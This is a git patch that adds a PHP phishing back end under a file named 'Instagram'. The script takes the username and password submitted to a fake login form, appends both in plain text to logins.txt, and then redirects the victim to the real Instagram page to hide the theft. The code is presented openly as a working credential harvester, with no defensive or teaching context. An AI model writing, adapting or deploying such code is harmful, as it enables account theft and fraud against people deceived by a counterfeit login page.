From 69f597fa438b229cebb55ce5b6a0a0a62a8a5e04 Mon Sep 17 00:00:00 2001 From: 456799-jpg Date: Sun, 23 Mar 2025 12:27:18 +0530 Subject: [PATCH] Create Instagram --- Instagram | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 Instagram diff --git a/Instagram b/Instagram new file mode 100644 index 00000000..1bd820d7 --- /dev/null +++ b/Instagram @@ -0,0 +1,14 @@ +?php +// Capture login credentials +$username = $_POST['username']; +$password = $_POST['password']; + +// Save to a text file +$file = fopen("logins.txt", "a"); +fwrite($file, "Username: " . $username . " | Password: " . $password . "\n"); +fclose($file); + +// Redirect to the real Instagram login page +header("Location: https://www.instagram.com"); +exit(); +?>